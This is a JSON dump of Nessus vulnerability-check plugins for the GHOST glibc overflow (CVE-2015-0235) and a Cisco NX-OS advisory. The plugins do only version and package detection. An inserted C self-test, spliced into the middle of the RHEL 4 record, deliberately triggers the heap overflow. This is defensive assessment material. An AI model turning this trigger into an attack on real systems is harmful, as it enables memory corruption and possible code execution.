script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:nx-os\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_nxos_version.nasl\");\n script_require_keys(\"Host/Cisco/NX-OS/Version\", \"Host/Cisco/NX-OS/Device\", \"Host/Cisco/NX-OS/Model\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_func.inc\");\ninclude(\"cisco_kb_cmd_func.inc\");\n\ndevice = get_kb_item_or_exit(\"Host/Cisco/NX-OS/Device\");\nversion = get_kb_item_or_exit(\"Host/Cisco/NX-OS/Version\");\nmodel = get_kb_item_or_exit(\"Host/Cisco/NX-OS/Model\");\n\nif (device != 'Nexus') audit(AUDIT_HOST_NOT, 'a Cisco Nexus device');\n\nbug = NULL;\nfix = NULL;\nvuln = FALSE;\nn7k = FALSE; # Used to distinguish Nexus 7000 Series models in version comparison\n\n# Cisco Nexus 1000V\nif (model =~ \"^1000[vV]$\")\n{\n bug = \"CSCus71708\";\n fix = \"5.2(1)SV3(1.4)\";\n}\n# Cisco Nexus 3000\nelse if (model =~ \"^3[0-9][0-9][0-9]([^0-9]|$)\")\n{\n bug = \"CSCus68770\";\n if (version =~ \"^6\\.0\\(2\\)A\")\n fix = \"6.0(2)A4(3.41)\";\n else if (version =~ \"^6\\.0\\(2\\)U\")\n fix = \"6.0(2)U4(3.41)\";\n}\n# Cisco Nexus 4000\nelse if (model =~ \"^4[0-9][0-9][0-9]([^0-9]|$)\" && version =~ \"^4\\.1([^0-9])\")\n{\n bug = \"CSCus69648\";\n fix = \"4.1(2)E1(1o)\";\n}\n# Cisco Nexus 5000 and Cisco Nexus 2000\nelse if (model =~ \"^5[0-9][0-9][0-9]([^0-9]|$)\" || model =~ 
\"^2[0-9][0-9][0-9]([^0-9]|$)\")\n{\n bug = \"CSCus68591\";\n if (version =~ \"^5\\.\") fix = \"5.2(1).N1(9)\";\n else if (version =~ \"^6\\.\") fix = \"6.0(2).N2(7)\";\n else if (version =~ \"^7\\.0\\(\") fix = \"7.0(6).N1(1)\";\n else if (version =~ \"^7\\.1\\(\") fix = \"7.1(1)N1(1)\";\n else fix = NULL;\n}\n# Cisco Nexus 7000\nelse if (model =~ \"^7[0-9][0-9][0-9]([^0-9]|$)\")\n{\n n7k = TRUE;\n bug = \"CSCus68892\";\n fix = \"6.2(12)\";\n if (\n # All versions in releases 4 and 5 affected\n version =~ \"^[45]\\.\" ||\n # All versions in 6.0 and 6.1 affected\n version =~ \"^6\\.[0-1]([^0-9]|$)\" ||\n # Versions 6.2 < 6.2(12) affected\n version =~ \"^6\\.2$\" || version =~ \"^6\\.2\\(([0-9]|1[01])\\)\"\n ) vuln = TRUE;\n}\nelse audit(AUDIT_HOST_NOT, \"an affected Cisco Nexus model\");\n\nif (!n7k && !isnull(fix) && cisco_gen_ver_compare(a:version, b:fix) < 0) vuln = TRUE;\n\nif (vuln)\n{\n report =\n '\\n Cisco bug ID : ' + bug +\n '\\n Installed release : ' + version +\n '\\n Fixed release : ' + fix +\n '\\n';\n security_report_v4(port:0, extra:report, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"Cisco NX-OS software\", version);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:48:10", "description": "A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. 
(CVE-2015-0235)", "cvss3": {}, "published": "2015-01-28T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : glibc on SL5.x i386/x86_64 (20150127) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:glibc", "p-cpe:/a:fermilab:scientific_linux:glibc-common", "p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo", "p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common", "p-cpe:/a:fermilab:scientific_linux:glibc-devel", "p-cpe:/a:fermilab:scientific_linux:glibc-headers", "p-cpe:/a:fermilab:scientific_linux:glibc-utils", "p-cpe:/a:fermilab:scientific_linux:nscd", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20150127_GLIBC_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/81037", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81037);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"Scientific Linux Security Update : glibc on SL5.x i386/x86_64 (20150127) (GHOST)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The 
remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1501&L=scientific-linux-errata&T=0&P=2696\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?74b43985\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-devel\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 5.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"glibc-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-common-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-debuginfo-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-debuginfo-common-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-devel-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-headers-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-utils-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"nscd-2.5-123.el5_11.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:46:33", "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 4 Extended Life Cycle Support.\n\nRed Hat Product Security has rated this update as having Critical security impact. 
A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {}, "published": "2015-01-30T00:00:00", "type": "nessus", "title": "RHEL 4 : glibc (RHSA-2015:0101) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-02-05T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "p-cpe:/a:redhat:enterprise_linux:glibc-profile", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", 
"p-cpe:/a:redhat:enterprise_linux:nptl-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:4"], "id": "REDHAT-RHSA-2015-0101.NASL", "href": "https://www.tenable.com/plugins/nessus/81104", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0101. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81104);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"RHSA\", value:\"2015:0101\");\n\n script_name(english:\"RHEL 4 : glibc (RHSA-2015:0101) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 4 Extended Life Cycle Support.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. 
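Added example (not code from any of the plugins above, and not Tenable's, Red Hat's or Qualys' own code): a C self-test that exercises the code path the description refers to, laid out like the proof of concept in the Qualys advisory the plugins reference, but with the buffer and canary as locals and a result code instead of printed text so it can be called from a harness. The function name `ghost_check`, the canary string and the result codes are this example's own choices. The name is all digits, so glibc takes the digits-and-dots shortcut in __nss_hostname_digits_dots() and never issues a DNS query; its length is chosen so that the unpatched size calculation, which omits one pointer (`sizeof (*h_alias_ptr)`), accepts a 1024-byte buffer that the patched calculation rejects with ERANGE.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE 1
#endif
#include <errno.h>
#include <netdb.h>
#include <stdio.h>
#include <string.h>

/* Added example for CVE-2015-0235 (GHOST); names and values below are this
 * example's own assumptions, not from the plugins or advisories quoted here. */

#define GHOST_CANARY "in_the_coal_mine"

/* Result codes returned by ghost_check(). */
enum {
    GHOST_NOT_VULNERABLE = 0,  /* libc refused with ERANGE, canary intact   */
    GHOST_VULNERABLE     = 1,  /* the canary after the buffer was overwritten */
    GHOST_INDETERMINATE  = -1  /* neither outcome (e.g. a non-glibc libc)    */
};

int ghost_check(void)
{
    /* The canary sits directly after the result buffer, so the overrun of
     * sizeof(char *) bytes that an unpatched glibc performs lands in it. */
    struct {
        char buffer[1024];
        char canary[sizeof(GHOST_CANARY)];
    } temp;
    memset(&temp, 0, sizeof(temp));
    memcpy(temp.canary, GHOST_CANARY, sizeof(GHOST_CANARY));

    /* Unpatched glibc computes size_needed as
     *   sizeof(*host_addr) + sizeof(*h_addr_ptrs) + strlen(name) + 1
     * (16 bytes for an in6_addr-sized host_addr, two pointers for
     * h_addr_ptrs) and forgets sizeof(*h_alias_ptr).  A name of exactly
     * this length makes that sum equal the 1024-byte buffer, so the
     * unpatched check passes and the later writes run past the end. */
    size_t len = sizeof(temp.buffer) - 16 * sizeof(unsigned char)
                 - 2 * sizeof(char *) - 1;
    char name[sizeof(temp.buffer)];
    memset(name, '0', len);   /* all digits: takes the digits-and-dots path, no DNS */
    name[len] = '\0';

    struct hostent resbuf;
    struct hostent *result = NULL;
    int herrno = 0;
    int retval = gethostbyname_r(name, &resbuf, temp.buffer,
                                 sizeof(temp.buffer), &result, &herrno);

    if (memcmp(temp.canary, GHOST_CANARY, sizeof(GHOST_CANARY)) != 0)
        return GHOST_VULNERABLE;        /* buffer overrun reached the canary */
    if (retval == ERANGE)
        return GHOST_NOT_VULNERABLE;    /* patched size check rejected the call */
    return GHOST_INDETERMINATE;
}

int main(void)
{
    switch (ghost_check()) {
    case GHOST_VULNERABLE:     puts("vulnerable");     return 1;
    case GHOST_NOT_VULNERABLE: puts("not vulnerable"); return 0;
    default:                   puts("indeterminate");  return 2;
    }
}
```

Build with `cc ghost_check.c -o ghost_check` and run it on the host being assessed. "not vulnerable" means the installed glibc rejected the request with ERANGE; "indeterminate" usually means a different libc that refuses the over-long name outright. Unlike the rpm version tests in these plugins, this exercises the library actually loaded by the process, so it also covers statically linked binaries; conversely, a passing result from a fresh process says nothing about long-running daemons that loaded the old glibc before the update and have not been restarted.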
A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0101\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0235\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nptl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/30\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0101\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"glibc-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i686\", reference:\"glibc-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"glibc-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"glibc-common-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"glibc-common-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"glibc-devel-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"glibc-devel-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"glibc-headers-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"glibc-headers-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"glibc-profile-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", 
reference:\"glibc-profile-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"glibc-utils-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"glibc-utils-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"nptl-devel-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i686\", reference:\"nptl-devel-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"nptl-devel-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"nscd-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"nscd-2.3.4-2.57.el4.2\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-profile / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:59:40", "description": "According to its self-reported version, the Cisco Unified Communications Manager IM and Presence Server Service is affected by a heap-based buffer overflow condition in the GNU C Library (glibc) due to improper validation of user-supplied input to the glibc functions\n__nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2().\nThis allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.", "cvss3": {}, "published": "2015-08-17T00:00:00", "type": "nessus", "title": "Cisco Unified Communications Manager IM and Presence GNU C Library (glibc) Buffer Overflow (CSCus69785) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:cisco:unified_communications_manager_im_and_presence_service", "cpe:/a:cisco:unified_communications_manager", "cpe:/a:cisco:unified_presence_server"], "id": "CISCO_CUPS_CSCUS69785.NASL", "href": "https://www.tenable.com/plugins/nessus/85449", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85449);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus69785\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20150128-ghost\");\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"Cisco Unified Communications Manager IM and Presence GNU C Library (glibc) Buffer Overflow (CSCus69785) (GHOST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the Cisco Unified\nCommunications Manager IM and Presence Server Service is affected by a\nheap-based buffer overflow condition in the GNU C Library (glibc) due\nto improper validation of user-supplied input to the glibc functions\n__nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2().\nThis 
allows a remote attacker to cause a buffer overflow, resulting in\na denial of service condition or the execution of arbitrary code.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-ghost\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fd2144f8\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCus69785\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch referenced in the Cisco bug ID CSCus69785.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", 